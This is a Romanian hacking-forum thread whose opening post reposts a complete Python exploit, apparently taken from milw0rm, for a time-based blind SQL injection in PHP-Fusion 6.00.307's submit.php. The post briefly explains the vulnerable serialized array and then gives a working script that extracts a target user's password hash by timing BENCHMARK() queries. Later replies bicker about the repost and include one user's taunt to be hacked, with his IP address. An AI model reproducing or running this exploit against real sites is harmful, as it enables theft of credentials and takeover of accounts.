Jump to content
Proxenon

PHP-Fusion 6.00.307 Remote Blind SQL Injection Exploit

By Proxenon, in Exploituri

Recommended Posts

Proxenon Newbie

Proxenon

Posted
Posted

#!/usr/bin/python

"""

#=================================================================================================#

# ____ __________ __ ____ __ #

# /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ #

# | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ #

# | | | \ | |/ \ \___| | /_____/ | || | #

# |___|___| /\__| /______ /\___ >__| |___||__| #

# \/\______| \/ \/ #

#=================================================================================================#

# This was a priv8 Exploit #

#=================================================================================================#

# PHP-Fusion 6.00.307 #

# And Probably All Other Versions #

# Blind Sql Injection Vulnerability #

# Benchmark Method #

#====================================#===========#====================================#===========#

# Server Configuration Requirements # # Some Information # #

#====================================# #====================================# #

# # #

# magic_quotes_gpc = 0 # Vendor: php-fusion.co.uk #

# # Author: The:Paradox #

#================================================# Severity: Moderately Critical #

# # #

# Oh wow no-content space! Enjoy it! # Proud To Be Italian. #

# # #

#====================================#===========#================================================#

# Proof Of Concept / Bug Explanation # #

#====================================# #

# PHP-Fusion presents a critical vulnerability in submit.php page. Let's see source: #

#=================================================================================================#

[submit.php]

1. if ($stype == "l") {

2.

3. if (isset($_POST['submit_link'])) {

4.

5. if ($_POST['link_name'] != "" && $_POST['link_url'] != "" && $_POST['link_description'] != "") {

6. $submit_info['link_category'] = stripinput($_POST['link_category']);

7. $submit_info['link_name'] = stripinput($_POST['link_name']);

8. $submit_info['link_url'] = stripinput($_POST['link_url']);

9. $submit_info['link_description'] = stripinput($_POST['link_description']);

10. $result = dbquery("INSERT INTO ".$db_prefix."submissions (submit_type, submit_user, submit_datestamp, submit_criteria) VALUES ('l', '".$userdata['user_id']."', '".time()."', '".serialize($submit_info)."')");

#=================================================================================================#

# Look to the sql query. #

# There are two variables: $userdata['user_id'] and a serialized array $submit_info. #

# The user_id is an intval value and array values link_category, link_name, link_url and #

# link_description are correctly cleaned via fusions' stripinput() function. #

# #

# All seems pretty cleaned. #

# But what would happen if we set another value into submit_info[] array via gpc vars? #

# It will be set in the serialized array, and obvious it will not checked by stripinput. #

# Sql Injection possibility! #

# #

# Let's see: #

# #

# Host: 127.0.0.1 #

# POST PHP-Fusion/submit.php?stype=l #

# link_category=1 link_name=1 link_url=1 link_description=1 submit_info[paradox]=' submit_link=1 #

# #

# It will result in sql error in case of Mq = 0 : #

# #

# You have an error in your SQL syntax; check [...] #

# #

#=================================================================================================#

# Normally to make this trick working register_globals = 1 is needed, but in php-fusion uses #

# extract() to simulate register_globals when it is set to 0. #

#=================================================================================================#

# Use this at your own risk. You are responsible for your own deeds. #

#=================================================================================================#

# Python Exploit Starts #

#=================================================================================================#

"""

from httplib import HTTPConnection

from urllib import urlencode

from time import time

from sys import exit, argv, stdout

from md5 import new

print """

#=================================================================#

# PHP-Fusion v6.00.307 #

# And Probably All Other Versions #

# Blind Sql Injection Vulnerability #

# Benchmark Method #

# #

# Discovered By The:Paradox #

# #

# Usage: #

# ./fusiown [Target] [Path] [ValidId] [ValidPass] [TargetUserid] #

# #

# Example: #

# ./fusiown localhost /phpfusion/ 40 s3cr3t 1 #

# ./fusiown www.host.org / 791 myp4ssw0rd 1 #

#=================================================================#

"""

if len(argv)<=5: exit()

else: print "[.]Exploit Starting."

prefix = "fusion_"

benchmark = "230000000"

vtime = 6

port = 80

target = argv[1]

path = argv[2]

cuid = argv[3]

cpass = argv[4]

uid = argv[5]

j=1

h4sh = ""

ht = []

for k in range(48,58):

ht.append(k)

for k in range(97,103):

ht.append(k)

ht.append(0)

def calc_md5(p):

hash = new()

hash.update(p)

return hash.hexdigest()

print "[.]Blind Sql Injection Starts.\n\nHash:"

while j <= 32:

for i in ht:

if i == 0: exit('[-]Exploit Failed.\n')

start = time()

conn = HTTPConnection(target,port)

inj = "' OR (SELECT IF((ASCII(SUBSTRING(user_password," + str(j) + ",1))=" + str(i) + "),benchmark(" + benchmark + ",CHAR(0)),0) FROM " + prefix + "users WHERE user_id=" + uid + "))# BH > WH"

conn.request("POST", path + "submit.php?stype=l", urlencode({'link_category': '1', 'link_name': '1', 'link_url': '1', 'link_description': '1', 'submit_link' : 'Submit+Link', 'submit_info[cGd0MQ==]' : inj }), {"Accept": "text/plain", "Content-Type" : "application/x-www-form-urlencoded","Cookie": "fusion_user=" + cuid + "." + calc_md5(cpass) + ";"})

response = conn.getresponse()

read = response.read()

if response.status == 404: exit('[-]Error 404. Not Found.')

now = time()

if now - start > vtime:

stdout.write(chr(i))

stdout.flush()

h4sh += chr(i)

j += 1

break;

print "\n\n[+]All Done.\n-=Paradox Got This One=-"

# milw0rm.com [2008-04-19]

SirGod Contributor

SirGod

Posted
Posted
Crezi ca avem nevoie de exploituri de pe millworm copiate aici?

Ia numai face pe adminu aici si lasa-l in pace.Daca ce a facut e gresit atunci un admin v-a lua o decizie,nu tu,parerea ta nu conteaza in aceste cazuri.

SirGod Contributor

SirGod

Posted
Posted

:))))))

Hecare nici tie nu ti-a cerut nimeni parerea cand ai postat(spammer).

Asa e am un mare noroc ca altfel imi spargeai parola de mess si imi dadeai format la PC ...

Astept sa ma hecaresti

Ip meu : 86.126.116.204 (poate sa iti confirme un admin daca nu crezi ca e cel real)

Si inca ceva ..cum zicea BanKai ... Variantele ca cel cu un nume de tip numeX,Xnume etc sa fie ratat sunt de 99%...si tu faci parte din acea parte.Astept sa ma ataci..dupa ce o sa imi inchid PC si o sa ma bag sub pat de frica...

SirGod Contributor

SirGod

Posted
Posted

:-j ...nu ma intereseaza ce crezi tu despre mine...nu-mi pasa...oricum eu astept sa ma hecaresti..

EL:

nu vreau sa incepem cearta/razboi sau cum vrei sa-i zici...oricine poate sa se certe..dar daca vrei ne certam blabla,asta facem...dar nu aici.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...